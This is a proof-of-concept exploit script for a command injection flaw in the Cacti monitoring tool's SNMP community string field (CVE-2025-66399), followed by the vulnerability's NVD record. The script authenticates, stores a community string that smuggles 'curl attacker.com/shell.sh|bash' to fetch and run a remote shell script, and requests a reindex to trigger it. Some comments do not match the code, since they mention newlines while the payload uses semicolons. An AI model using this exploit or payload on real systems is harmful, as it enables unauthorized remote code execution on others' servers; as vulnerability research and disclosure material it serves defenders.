CVE-2025-66399

# CVE-2025-66399 PoC - Cacti SNMP Community String Command Injection # This PoC demonstrates injecting commands via SNMP community strings import requests import json # Configuration CACTI_URL = "http://target.com/cacti" USERNAME = "attacker" PASSWORD = "password123" TARGET_HOST = "http://attacker.com/" def login(session): """Authenticate to Cacti""" login_url = f"{CACTI_URL}/index.php" data = { "action": "login", "login_username": USERNAME, "login_password": PASSWORD } response = session.post(login_url, data=data) return "cacti_session" in session.cookies def inject_snmp_community(session): """Inject malicious SNMP community string with command injection""" # Construct malicious community string with newline for command injection malicious_community = f"public;curl {TARGET_HOST}/shell.sh|bash;#" devices_url = f"{CACTI_URL}/host.php" data = { "action": "save", "host_template_id": "1", "description": "Malicious Device", "hostname": "192.168.1.1", "snmp_community": malicious_community, "snmp_version": "2", "method": "save" } response = session.post(devices_url, data=data) return response.status_code == 200 def trigger_execution(session, device_id): """Trigger SNMP operation to execute injected command""" reindex_url = f"{CACTI_URL}/host.php" data = { "action": "reindex", "host_id": device_id } response = session.post(reindex_url, data=data) return response def main(): session = requests.Session() if not login(session): print("[-] Authentication failed") return print("[+] Successfully authenticated") if inject_snmp_community(session): print("[+] Malicious SNMP community string injected") print("[+] Wait for scheduled SNMP reindex task to trigger command execution") else: print("[-] Failed to inject community string") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-66399", "sourceIdentifier": "[email protected]", "published": "2025-12-02T18:15:49.540", "lastModified": "2025-12-05T18:57:11.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cacti is an open source performance and fault management framework. Prior to 1.2.29, there is an input-validation flaw in the SNMP device configuration functionality. An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations. In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process. This vulnerability is fixed in 1.2.29."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.29", "matchCriteriaId": "C0B80A90-97E0-49C0-A780-695E17B0568C"}]}]}], "references": [{"url": "https://github.com/Cacti/cacti/security/advisories/GHSA-c7rr-2h93-7gjf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}